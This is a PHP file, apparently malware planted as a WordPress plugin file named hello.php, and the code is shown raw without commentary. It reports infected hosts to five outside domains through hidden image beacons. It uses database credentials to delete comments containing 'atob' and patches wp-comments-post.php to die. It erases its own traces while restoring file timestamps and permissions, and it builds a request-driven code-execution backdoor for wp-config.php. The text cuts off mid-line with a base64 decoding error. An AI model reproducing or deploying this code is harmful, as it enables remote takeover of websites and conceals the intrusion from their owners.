<?phpfunction Uno_encode($String){ return urlencode(base64_encode(~$S

1. <?php
2.  
3. function Uno_encode($String)
4. {
5. return urlencode(base64_encode(~$String));
6. }
7.  
8. function report($rcd){
9. $recivers[] = 'http://rp.cd-kyywater.com/';
10. $recivers[] = 'http://rp.byby-sh5.com/';
11. $recivers[] = 'http://rp.titianjewelry.com/';
12. $recivers[] = 'http://rp.tumourhealth.com/';
13. $recivers[] = 'http://rp.china-touyingji.com/';
14. $z = str_replace('wp-content/plugins/hello.php','',$_SERVER["REQUEST_URI"]);
15. $report = Uno_encode($_SERVER["HTTP_HOST"]. $z . '|' . $rcd);
16. shuffle($recivers);
17. foreach($recivers as $t){
18. echo '<img width=1 height=1 src="' .$t . '?data=' .$report.'">';
19. }
20. }
21.  
22. function remove_comment(){
23. include_once('../../wp-config.php');
24.  
25. $con = mysql_connect(DB_HOST,DB_USER,DB_PASSWORD);
26. mysql_select_db(DB_NAME, $con);
27.  
28. $zapros = 'delete from ' . $table_prefix . 'comments where comment_content like \'%atob%\';';
29. $r = mysql_query($zapros);
30. mysql_close($con);
31. }
32.  
33. function patch_wp(){
34. $fname = '../../wp-comments-post.php';
35. if(file_exists($fname)){
36. $t = '<?php die(); ?>' . PHP_EOL;
37.  
38. $time = filemtime($fname);
39. $writ = false;
40.  
41. if (!is_writable($fname)){
42. $perm = substr(sprintf('%o', fileperms($fname)), -4);
43. @chmod($fname,0666);
44. $writ = true;
45. }
46.  
47. clearstatcache();
48. if (is_writable($fname)){
49. $tmp = @file_get_contents($fname);
50. $tmp = $t . $tmp;
51. }
52. if (strlen($tmp) > 10){
53.  
54. $f = fopen($fname,"w");
55. fputs($f,$tmp);
56. fclose($f);
57. }
58.  
59. clearstatcache();
60.  
61. if ($writ){
62. for($i=strlen($perm)-1;$i>=0;--$i){
63. $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));
64. }
65. @chmod($fname,$perms);
66. }
67.  
68. @touch($fname,$time);
69. }
70. }
71.  
72. function self_remove(){
73. $fname = __FILE__;
74. $time = filemtime($fname);
75. $writ = false;
76.  
77. if (!is_writable($fname)){
78. $perm = substr(sprintf('%o', fileperms($fname)), -4);
79. @chmod($fname,0666);
80. $writ = true;
81. }
82.  
83. clearstatcache();
84. if (is_writable($fname)){
85. $tmp = @file_get_contents($fname);
86.  
87. $pos = strpos($tmp,'1764d133d7351bf6'.'a27d2deb3c521a02');
88. $tmp = substr($tmp,$pos + 32);
89.  
90. if (strlen($tmp) > 10){
91.  
92. $f = fopen($fname,"w");
93. fputs($f,$tmp);
94. fclose($f);
95. }
96.  
97. clearstatcache();
98.  
99. if ($writ){
100. for($i=strlen($perm)-1;$i>=0;--$i){
101. $perms += (int)$perm[$i]*pow(8, (strlen($perm)-$i-1));
102. }
103. @chmod($fname,$perms);
104. }
105.  
106. @touch($fname,$time);
107. }
108. }
109.  
110. $fname = '../../wp-config.php';
111.  
112. if(file_exists($fname)){
113.  
114. $rcd = md5($_SERVER["HTTP_HOST"].$_SERVER["HTTP_USER_AGENT"].rand(0,10000));
115. $t = 'if (isset($_REQUEST[\'FILE\'])){$_SERVERS = strrev($_REQUEST[\''.$rcd.'\']);$_FILE = $_SERVERS(\'$_\',strrev($_REQUEST[\'FILE\']).\'($_);\');$_FILE(stripslashes($_REQUEST[\'HOST\']));}';
116. $time = filemtimbase64: invalid input